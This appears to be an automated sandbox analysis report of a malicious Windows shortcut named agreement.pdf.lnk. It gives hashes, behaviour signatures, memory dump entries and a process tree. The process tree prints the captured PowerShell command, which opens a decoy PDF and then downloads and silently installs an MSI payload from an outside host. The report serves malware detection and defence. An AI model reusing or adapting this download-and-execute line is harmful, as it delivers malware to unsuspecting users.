Overview

overview

8

Static

static

agreement.pdf.lnk

windows7-x64

3

agreement.pdf.lnk

windows10-2004-x64

8

Analysis

  • max time kernel
    42s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    30/01/2023, 23:49

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    agreement.pdf.lnk

  • Size

    2KB

  • MD5

    291d82d4bcfcbb060f93143d7d04be74

  • SHA1

    3473c3e5b8c9379ebe0ef0fb59211e43ada4b716

  • SHA256

    db2455440bb46036cbb5b7652786e005a837f5e2784540faca0a5c198d8952e6

  • SHA512

    9d35371987d01be209bc65598c1c1a422c8782160c2ff9831ee7a90800e1b5a1b85e9db4104b6d41d34cb2fc94797b9d05399dc105e3a49f572407afbe516fee

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\agreement.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" start microsoft-edge:https://docus.space/agrnt.pdf; Invoke-WebRequest -URI https://docus.space/dl.php -outfile $env:TEMP\Driver.msi; Push-Location -Path $env:TEMP; .\Driver.msi /qn; ex
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1384

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1384-93-0x000007FEF41E0000-0x000007FEF4C03000-memory.dmp

          Filesize

          10.1MB

          Download

        • memory/1384-95-0x0000000002474000-0x0000000002477000-memory.dmp

          Filesize

          12KB

          Download

        • memory/1384-94-0x000007FEF3680000-0x000007FEF41DD000-memory.dmp

          Filesize

          11.4MB

          Download

        • memory/1384-96-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

          Filesize

          3.0MB

          Download

        • memory/1384-97-0x000000000247B000-0x000000000249A000-memory.dmp

          Filesize

          124KB

          Download

        • memory/1384-98-0x0000000002474000-0x0000000002477000-memory.dmp

          Filesize

          12KB

          Download

        • memory/1384-99-0x000000000247B000-0x000000000249A000-memory.dmp

          Filesize

          124KB

          Download

        • memory/1792-54-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmp

          Filesize

          8KB

          Download